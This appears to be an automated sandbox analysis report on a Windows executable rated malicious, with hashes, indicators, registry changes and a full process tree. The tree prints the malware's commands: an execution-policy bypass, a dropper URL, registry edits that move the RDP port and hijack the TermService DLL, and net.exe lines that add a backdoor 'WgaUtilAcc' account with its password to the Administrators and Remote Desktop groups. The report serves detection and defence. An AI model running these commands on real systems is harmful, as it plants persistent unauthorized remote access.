cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3

Analysis

max time kernel
120s
max time network
164s
platform
windows10_x64
resource
win10-en-20210920
submitted
26-10-2021 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63151e4f7c3972f18a23c0e9996e14ef.exe
Size

5.7MB
MD5

63151e4f7c3972f18a23c0e9996e14ef
SHA1

5d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256

cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512

f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	Process
29	2156	powershell.exe
31	2156	powershell.exe
32	2156	powershell.exe
33	2156	powershell.exe
35	2156	powershell.exe
37	2156	powershell.exe
39	2156	powershell.exe
41	2156	powershell.exe
43	2156	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000700000001abb5-353.dat	upx
behavioral2/files/0x000700000001abb6-354.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
3232
3232

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI30F0.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_yqqorn22.vpv.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI30D0.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3121.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3110.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3122.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_holhmxff.avh.ps1	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
4020	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	35	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe
776	powershell.exe
776	powershell.exe
776	powershell.exe
3788	powershell.exe
3788	powershell.exe
3788	powershell.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
640
640

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3788	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeIncreaseQuotaPrivilege	3988	powershell.exe
Token: SeSecurityPrivilege	3988	powershell.exe
Token: SeTakeOwnershipPrivilege	3988	powershell.exe
Token: SeLoadDriverPrivilege	3988	powershell.exe
Token: SeSystemProfilePrivilege	3988	powershell.exe
Token: SeSystemtimePrivilege	3988	powershell.exe
Token: SeProfSingleProcessPrivilege	3988	powershell.exe
Token: SeIncBasePriorityPrivilege	3988	powershell.exe
Token: SeCreatePagefilePrivilege	3988	powershell.exe
Token: SeBackupPrivilege	3988	powershell.exe
Token: SeRestorePrivilege	3988	powershell.exe
Token: SeShutdownPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeSystemEnvironmentPrivilege	3988	powershell.exe
Token: SeRemoteShutdownPrivilege	3988	powershell.exe
Token: SeUndockPrivilege	3988	powershell.exe
Token: SeManageVolumePrivilege	3988	powershell.exe
Token: 33	3988	powershell.exe
Token: 34	3988	powershell.exe
Token: 35	3988	powershell.exe
Token: 36	3988	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeIncreaseQuotaPrivilege	776	powershell.exe
Token: SeSecurityPrivilege	776	powershell.exe
Token: SeTakeOwnershipPrivilege	776	powershell.exe
Token: SeLoadDriverPrivilege	776	powershell.exe
Token: SeSystemProfilePrivilege	776	powershell.exe
Token: SeSystemtimePrivilege	776	powershell.exe
Token: SeProfSingleProcessPrivilege	776	powershell.exe
Token: SeIncBasePriorityPrivilege	776	powershell.exe
Token: SeCreatePagefilePrivilege	776	powershell.exe
Token: SeBackupPrivilege	776	powershell.exe
Token: SeRestorePrivilege	776	powershell.exe
Token: SeShutdownPrivilege	776	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeSystemEnvironmentPrivilege	776	powershell.exe
Token: SeRemoteShutdownPrivilege	776	powershell.exe
Token: SeUndockPrivilege	776	powershell.exe
Token: SeManageVolumePrivilege	776	powershell.exe
Token: 33	776	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

63151e4f7c3972f18a23c0e9996e14ef.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 3796 wrote to memory of 3788	3796	63151e4f7c3972f18a23c0e9996e14ef.exe	71
PID 3796 wrote to memory of 3788	3796	63151e4f7c3972f18a23c0e9996e14ef.exe	71
PID 3788 wrote to memory of 2096	3788	powershell.exe	73
PID 3788 wrote to memory of 2096	3788	powershell.exe	73
PID 2096 wrote to memory of 688	2096	csc.exe	74
PID 2096 wrote to memory of 688	2096	csc.exe	74
PID 3788 wrote to memory of 2392	3788	powershell.exe	75
PID 3788 wrote to memory of 2392	3788	powershell.exe	75
PID 3788 wrote to memory of 3988	3788	powershell.exe	78
PID 3788 wrote to memory of 3988	3788	powershell.exe	78
PID 3788 wrote to memory of 776	3788	powershell.exe	80
PID 3788 wrote to memory of 776	3788	powershell.exe	80
PID 3788 wrote to memory of 2028	3788	powershell.exe	82
PID 3788 wrote to memory of 2028	3788	powershell.exe	82
PID 3788 wrote to memory of 4020	3788	powershell.exe	83
PID 3788 wrote to memory of 4020	3788	powershell.exe	83
PID 3788 wrote to memory of 2308	3788	powershell.exe	84
PID 3788 wrote to memory of 2308	3788	powershell.exe	84
PID 3788 wrote to memory of 3832	3788	powershell.exe	85
PID 3788 wrote to memory of 3832	3788	powershell.exe	85
PID 3832 wrote to memory of 3216	3832	net.exe	86
PID 3832 wrote to memory of 3216	3832	net.exe	86
PID 3788 wrote to memory of 3940	3788	powershell.exe	87
PID 3788 wrote to memory of 3940	3788	powershell.exe	87
PID 3940 wrote to memory of 2220	3940	cmd.exe	88
PID 3940 wrote to memory of 2220	3940	cmd.exe	88
PID 2220 wrote to memory of 2196	2220	cmd.exe	89
PID 2220 wrote to memory of 2196	2220	cmd.exe	89
PID 2196 wrote to memory of 1852	2196	net.exe	90
PID 2196 wrote to memory of 1852	2196	net.exe	90
PID 3788 wrote to memory of 3876	3788	powershell.exe	91
PID 3788 wrote to memory of 3876	3788	powershell.exe	91
PID 3876 wrote to memory of 684	3876	cmd.exe	92
PID 3876 wrote to memory of 684	3876	cmd.exe	92
PID 684 wrote to memory of 3220	684	cmd.exe	93
PID 684 wrote to memory of 3220	684	cmd.exe	93
PID 3220 wrote to memory of 3648	3220	net.exe	94
PID 3220 wrote to memory of 3648	3220	net.exe	94
PID 3144 wrote to memory of 1068	3144	cmd.exe	98
PID 3144 wrote to memory of 1068	3144	cmd.exe	98
PID 1068 wrote to memory of 2184	1068	net.exe	99
PID 1068 wrote to memory of 2184	1068	net.exe	99
PID 3180 wrote to memory of 2096	3180	cmd.exe	102
PID 3180 wrote to memory of 2096	3180	cmd.exe	102
PID 2096 wrote to memory of 448	2096	net.exe	103
PID 2096 wrote to memory of 448	2096	net.exe	103
PID 2456 wrote to memory of 3948	2456	cmd.exe	106
PID 2456 wrote to memory of 3948	2456	cmd.exe	106
PID 3948 wrote to memory of 3032	3948	net.exe	107
PID 3948 wrote to memory of 3032	3948	net.exe	107
PID 2384 wrote to memory of 1356	2384	cmd.exe	110
PID 2384 wrote to memory of 1356	2384	cmd.exe	110
PID 1356 wrote to memory of 508	1356	net.exe	111
PID 1356 wrote to memory of 508	1356	net.exe	111
PID 1688 wrote to memory of 1624	1688	cmd.exe	114
PID 1688 wrote to memory of 1624	1688	cmd.exe	114
PID 1624 wrote to memory of 3344	1624	net.exe	115
PID 1624 wrote to memory of 3344	1624	net.exe	115
PID 2292 wrote to memory of 2388	2292	cmd.exe	118
PID 2292 wrote to memory of 2388	2292	cmd.exe	118
PID 2388 wrote to memory of 1892	2388	net.exe	119
PID 2388 wrote to memory of 1892	2388	net.exe	119
PID 1448 wrote to memory of 1416	1448	cmd.exe	122
PID 1448 wrote to memory of 1416	1448	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\63151e4f7c3972f18a23c0e9996e14ef.exe
"C:\Users\Admin\AppData\Local\Temp\63151e4f7c3972f18a23c0e9996e14ef.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3788
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5i4rqtwe\5i4rqtwe.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF156.tmp" "c:\Users\Admin\AppData\Local\Temp\5i4rqtwe\CSCA946B6C0DD3A414192C88BB2A31EE185.TMP"
      4⤵
      PID:688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2028
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:4020
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2308
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3216
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3940
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2220
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2196
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1852
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3876
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:684
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3220
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:3648
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:64
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2952

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3144
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2184

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc DiSWfQR2 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3180
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc DiSWfQR2 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc DiSWfQR2 /add
    3⤵
    PID:448

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2456
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:3032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD
    3⤵
    PID:508

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3344

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc DiSWfQR2
1⤵
- Suspicious use of WriteProcessMemory
PID:2292
